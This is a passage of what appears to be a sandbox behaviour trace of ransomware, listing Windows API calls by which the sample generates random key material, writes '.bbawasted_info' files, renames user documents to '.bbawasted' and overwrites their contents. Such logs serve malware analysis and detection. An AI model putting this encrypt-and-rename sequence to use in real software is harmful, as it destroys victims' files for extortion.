0xfe0000 [0070.657] CloseHandle (hObject=0xf8) returned 1 [0070.661] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.662] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.662] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.662] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.662] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.662] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.671] SetEndOfFile (hFile=0xfc) returned 1 [0070.673] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.673] CloseHandle (hObject=0xfc) returned 1 [0070.674] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.674] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cae48 | out: hHeap=0x580000) returned 1 [0070.674] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.675] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.675] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\o8oEGfgEeIHq1BaqxYd.csv") returned 93 [0070.675] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c4) returned 0x5bf070 [0070.675] lstrcpyW (in: lpString1=0x5bf12a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.675] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.675] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.676] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.676] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\o8oEGfgEeIHq1BaqxYd.csv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\o8oegfgeeihq1baqxyd.csv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.676] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.677] SetEndOfFile (hFile=0xfc) returned 1 [0070.677] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.677] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.677] lstrcpyW (in: lpString1=0x5bf12a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\o8oEGfgEeIHq1BaqxYd.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\o8oegfgeeihq1baqxyd.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\o8oEGfgEeIHq1BaqxYd.csv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\o8oegfgeeihq1baqxyd.csv.bbawasted")) returned 1 [0070.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\o8oEGfgEeIHq1BaqxYd.csv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\o8oegfgeeihq1baqxyd.csv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.678] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.678] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x51be [0070.678] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x51be) returned 0x570000 [0070.678] CloseHandle (hObject=0x11c) returned 1 [0070.681] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.681] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.681] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.681] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.682] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.682] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.713] SetEndOfFile (hFile=0xfc) returned 1 [0070.715] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.715] CloseHandle (hObject=0xfc) returned 1 [0070.717] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.717] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5caf60 | out: hHeap=0x580000) returned 1 [0070.717] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.718] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.718] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5mRP4R-vP.pdf") returned 63 [0070.718] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5bf070 [0070.718] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.718] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.718] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.719] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.719] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5mRP4R-vP.pdf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5mrp4r-vp.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.720] WriteFile (in: hFile=0xfc, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.721] SetEndOfFile (hFile=0xfc) returned 1 [0070.721] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.721] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.721] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5mRP4R-vP.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5mrp4r-vp.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5mRP4R-vP.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5mrp4r-vp.pdf.bbawasted")) returned 1 [0070.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5mRP4R-vP.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5mrp4r-vp.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.722] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.722] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x8fcd [0070.722] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8fcd) returned 0x570000 [0070.722] CloseHandle (hObject=0x120) returned 1 [0070.725] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.726] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.726] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.726] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.727] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.727] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.737] SetEndOfFile (hFile=0xfc) returned 1 [0070.739] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.739] CloseHandle (hObject=0xfc) returned 1 [0070.741] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.741] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ce718 | out: hHeap=0x580000) returned 1 [0070.741] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.742] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.742] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\80jIAs.pdf") returned 60 [0070.742] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x282) returned 0x5bf070 [0070.742] lstrcpyW (in: lpString1=0x5bf0e8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.742] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.742] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.742] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.743] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\80jIAs.pdf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\80jias.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.746] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.747] SetEndOfFile (hFile=0x120) returned 1 [0070.747] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.748] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.748] lstrcpyW (in: lpString1=0x5bf0e8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\80jIAs.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\80jias.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\80jIAs.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\80jias.pdf.bbawasted")) returned 1 [0070.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\80jIAs.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\80jias.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.748] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0070.748] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xc967 [0070.748] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc967) returned 0x570000 [0070.748] CloseHandle (hObject=0xf8) returned 1 [0070.752] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.752] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.752] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.752] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.753] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.753] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.761] SetEndOfFile (hFile=0x120) returned 1 [0070.764] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.764] CloseHandle (hObject=0x120) returned 1 [0070.765] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.765] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ce7f0 | out: hHeap=0x580000) returned 1 [0070.765] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.766] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.766] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\Fqs6PIpYfq2Z8IiuJjT.odp") returned 73 [0070.766] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5bf070 [0070.766] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.766] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.766] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.767] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.767] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\Fqs6PIpYfq2Z8IiuJjT.odp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\fqs6pipyfq2z8iiujjt.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.767] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.769] SetEndOfFile (hFile=0x120) returned 1 [0070.769] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.769] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.769] lstrcpyW (in: lpString1=0x5bf102, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\Fqs6PIpYfq2Z8IiuJjT.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\fqs6pipyfq2z8iiujjt.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\Fqs6PIpYfq2Z8IiuJjT.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\fqs6pipyfq2z8iiujjt.odp.bbawasted")) returned 1 [0070.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\Fqs6PIpYfq2Z8IiuJjT.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\fqs6pipyfq2z8iiujjt.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.769] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.770] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xe940 [0070.770] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe940) returned 0x570000 [0070.770] CloseHandle (hObject=0x110) returned 1 [0070.773] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.774] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.774] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.774] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.774] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.775] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.815] SetEndOfFile (hFile=0x120) returned 1 [0070.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.817] CloseHandle (hObject=0x120) returned 1 [0070.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c85e8 | out: hHeap=0x580000) returned 1 [0070.819] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.820] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.820] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\NO7LlquUjLwmEuCTBMEs.odt") returned 74 [0070.820] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5bf070 [0070.820] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.820] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.820] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.821] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.821] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\NO7LlquUjLwmEuCTBMEs.odt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\no7llquujlwmeuctbmes.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.826] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.827] SetEndOfFile (hFile=0x120) returned 1 [0070.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.827] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.827] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\NO7LlquUjLwmEuCTBMEs.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\no7llquujlwmeuctbmes.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\NO7LlquUjLwmEuCTBMEs.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\no7llquujlwmeuctbmes.odt.bbawasted")) returned 1 [0070.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\NO7LlquUjLwmEuCTBMEs.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\no7llquujlwmeuctbmes.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.828] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.828] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xf822 [0070.828] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf822) returned 0x570000 [0070.828] CloseHandle (hObject=0x11c) returned 1 [0070.832] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.832] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.832] CryptReleaseContext 